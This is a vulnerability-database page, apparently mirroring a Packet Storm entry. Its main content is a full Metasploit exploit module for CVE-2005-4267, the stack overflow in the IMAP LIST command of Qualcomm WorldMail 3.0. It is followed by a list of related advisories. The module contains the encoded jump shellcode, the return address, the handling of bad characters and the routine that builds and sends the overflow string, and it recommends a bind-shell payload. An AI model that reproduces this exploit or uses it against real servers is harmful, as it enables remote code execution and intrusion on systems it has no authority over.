Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormMCPACKETSTORM:83142
HistoryNov 26, 2009 - 12:00 a.m.

Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow

2009-11-2600:00:00
MC
packetstormsecurity.com
24

0.968 High

EPSS

Percentile

99.6%

JSON
`##  
# $Id$  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to   
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::Imap  
  
def initialize(info = {})  
super(update_info(info,   
'Name' => 'Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow',  
'Description' => %q{  
This module exploits a stack overflow in the Qualcomm WorldMail IMAP Server  
version 3.0 (build version 6.1.22.0). Using the PAYLOAD of windows/shell_bind_tcp  
allows or the most reliable results.  
},  
'Author' => [ 'MC' ],  
'License' => MSF_LICENSE,  
'Version' => '$Revision$',  
'References' =>  
[  
[ 'CVE', '2005-4267'],  
[ 'OSVDB', '22097'],  
[ 'BID', '15980'],  
  
],  
'Privileged' => true,  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'thread',  
},  
'Payload' =>  
{  
'Space' => 750,  
'BadChars' => "\x00\x0a\x20\x0d\x7b",   
'StackAdustment' => -3500,  
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,  
},  
'Platform' => 'win',  
'Targets' =>   
[  
[ 'WorldMail 3 Version 6.1.20', { 'Ret' => 0x10022187 } ], # msremote.dll  
],  
'DisclosureDate' => 'Dec 20 2005',  
'DefaultTarget' => 0))  
end  
  
def check  
connect  
disconnect  
  
if (banner and banner =~ /WorldMail 3 IMAP4 Server 6.1.22.0 ready/)  
return Exploit::CheckCode::Vulnerable  
end  
return Exploit::CheckCode::Safe  
end  
  
def exploit  
connect  
  
jmp = "\x6a\x05\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x2f\x77\x28"  
jmp << "\x4b\x83\xeb\xfc\xe2\xf4\xf6\x99\xf1\x3f\x0b\x83\x71\xcb\xee\x7d"  
jmp << "\xb8\xb5\xe2\x89\xe5\xb5\xe2\x88\xc9\x4b"  
  
sploit = "a001 LIST " + rand_text_alpha_upper(20, payload_badchars)   
sploit << payload.encoded + "\xeb\x06" + make_nops(2) + [target.ret].pack('V')   
sploit << make_nops(8) + jmp + rand_text_alpha_upper(40, payload_badchars)   
sploit << "}" + "\r\n"  
  
sock.put(sploit)  
  
handler  
disconnect  
end  
  
end  
`

Related

securityvulns 1
openvas 2
checkpoint_advisories 2
packetstorm 1
saint 4
cve 2
canvas 1
nessus 1
prion 1
securityvulns
securityvulns
[Full-disclosure] iDefense Security Advisory 12.20.05: Qualcomm WorldMail IMAP Server String Literal Processing Overflow Vulnerability
2005-12-20 00:00:00
openvas
openvas
Eudora WorldMail IMAP Server Buffer Overflow Vulnerability
2012-01-18 00:00:00
Eudora WorldMail IMAP Server Buffer Overflow Vulnerability
2012-01-18 00:00:00
checkpoint_advisories
checkpoint_advisories
IMAP Servers LIST Command Buffer Overflow (CVE-2005-4267)
2006-08-10 00:00:00
Qualcomm WorldMail IMAP Literal Token Parsing Buffer Overflow (CVE-2005-4267)
2009-11-05 00:00:00
packetstorm
packetstorm
eudora_imap.pm.txt
2006-02-14 00:00:00
saint
saint
Eudora WorldMail IMAP LIST command buffer overflow
2005-12-30 00:00:00
Eudora WorldMail IMAP LIST command buffer overflow
2005-12-30 00:00:00
Eudora WorldMail IMAP LIST command buffer overflow
2005-12-30 00:00:00
cve
cve
CVE-2005-4267
2005-12-21 11:03:00
CVE-2006-0637
2006-02-10 11:02:00
canvas
canvas
Immunity Canvas: WORLDMAIL
2005-12-21 11:03:00
nessus
nessus
Qualcomm WorldMail Multiple IMAP Command Remote Overflow
2005-12-20 00:00:00
prion
prion
Buffer overflow
2006-02-10 11:02:00

0.968 High

EPSS

Percentile

99.6%

JSON
Related for PACKETSTORM:83142
securityvulns1openvas2checkpoint_advisories2packetstorm1saint4cve2canvas1nessus1prion1